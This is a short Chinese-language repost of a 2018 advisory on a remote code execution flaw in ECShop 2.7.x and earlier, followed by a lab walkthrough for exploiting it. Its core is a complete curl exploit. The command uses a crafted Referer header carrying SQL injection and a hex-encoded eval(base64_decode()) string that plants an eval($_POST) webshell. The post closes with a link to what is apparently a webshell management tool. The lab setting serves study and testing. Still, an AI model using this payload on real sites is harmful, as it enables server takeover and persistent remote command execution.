2018年9月1日,阿里雲態勢感知發佈預警,近日利用ECShop全系列版本的遠程代碼執行漏洞進行批量化攻擊量呈上升趨勢,該漏洞可直接導致網站服務器淪陷,黑客可通過WEB攻擊直接獲得服務器權限,利用簡單且危害較大。因此,阿里雲安全專家提醒ECShop系統用戶及時進行修復。 —— ECShop全系列版本遠程代碼執行高危漏洞分析
漏洞分析:
預警| ECShop全系列版本遠程代碼執行高危漏洞 阿里雲WAF已可防禦
ECShop <= 2.7.x 全系列版本遠程代碼執行高危漏洞利用
在線實驗地址:
打開 VULNSPY ECSHOP 實驗環境
漏洞利用
-
點擊右上方 START TO HACK 按鈕創建 ECShop實驗環境
![在這裏插入圖片描述]()
-
創建完成後打開 ECSHOP 實驗地址
- 發送 Payload 執行 phpinfo();
將**.vsplate.me換成您的實驗地址*
在終端中執行:
curl http://*.vsplate.me/user.php -d ‘action=login&vulnspy=phpinfo();exit;’ -H ‘Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:“id”;s:3:"’"’"’/";s:3:“num”;s:201:"/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0–";s:4:“name”;s:3:“ads”;}554fcae493e564ee0dc75bdf2ebf94ca’
vulnspy
xise菜刀 http://caidaome.com
轉載,請參考轉載聲明,註明出處: https://www.anquanke.com/post/id/158677